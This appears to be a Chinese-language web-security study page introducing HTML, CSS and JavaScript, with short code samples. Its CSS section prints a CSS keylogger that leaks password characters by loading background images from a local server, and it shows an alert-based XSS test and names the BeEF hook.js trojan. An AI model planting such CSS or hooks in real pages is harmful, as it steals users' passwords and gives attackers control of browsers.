03.front end.md

goer ... 2022-01-21 Web安全
  • Web安全
小于 1 分钟

# 安全

前端

[toc]

# 前端

页面能看到的东西 一定先自学

# Html

HTML:(Hyper Text Markup Language)超文本标记语言

w3c:w3c (opens new window)

菜鸟:菜鸟 (opens new window)

<!DOCTYPE html>
<html lang="en">  
    <head>
        <title>web</title>
    </head>

    <body>
        <h3>hello web</h3>
    </body>
</html>
1
2
3
4
5
6
7
8
9
10

纯html(基本是没有漏洞的) 光着身体的孩子

# Css

CSS:(Cascading Style Sheets) 层叠样式表

<style>
*{
    margin:0;
    padding:0;
}
h3{
    font-size:30px;
}
</style>
1
2
3
4
5
6
7
8
9

纯css(漏洞很少) 装饰打扮人

键盘监听:keycode (opens new window)

/* 能看懂下面css代码么 */
input[type="password"][value$="0"] { background-image: url("http://localhost:3000/0"); }
input[type="password"][value$="1"] { background-image: url("http://localhost:3000/1"); }
input[type="password"][value$="2"] { background-image: url("http://localhost:3000/2"); }
1
2
3
4

# Javascript

Javascript: 客户端脚本语言,让前端动起来 一定要学

// script标签包起来
<script>
	alert(11);
</script>
1
2
3
4
  1. 纯javascript 漏洞很多很多 让人动起来
  2. xss

beef -> js远控木马 引入 hook.js 就会被控